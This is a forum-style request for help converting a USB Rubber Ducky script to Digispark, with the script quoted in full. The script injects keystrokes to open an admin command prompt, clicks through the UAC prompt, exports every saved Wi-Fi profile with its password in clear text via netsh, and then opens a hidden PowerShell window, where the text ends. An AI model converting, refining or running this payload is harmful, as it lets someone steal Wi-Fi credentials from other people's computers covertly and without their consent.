I need to convert this duck script do digispark, anyone can do it for me????
When I convert my script in the digiquack site I get too many errors
Here's the code:
REM let the HID enumerate
DELAY 1000
GUI r
DELAY 300
STRING cmd
DELAY 350
CTRL-SHIFT ENTER
DELAY 2000
ALT y
DELAY 500
STRING cd C:\
ENTER
DELAY 200
STRING md l
ENTER
DELAY 200
REM *** move into the new directory and export the wifi information ***
STRING cd l && netsh wlan export profile key=clear >nul
ENTER
DELAY 1500
STRING powershell -WindowStyle hidden
ENTER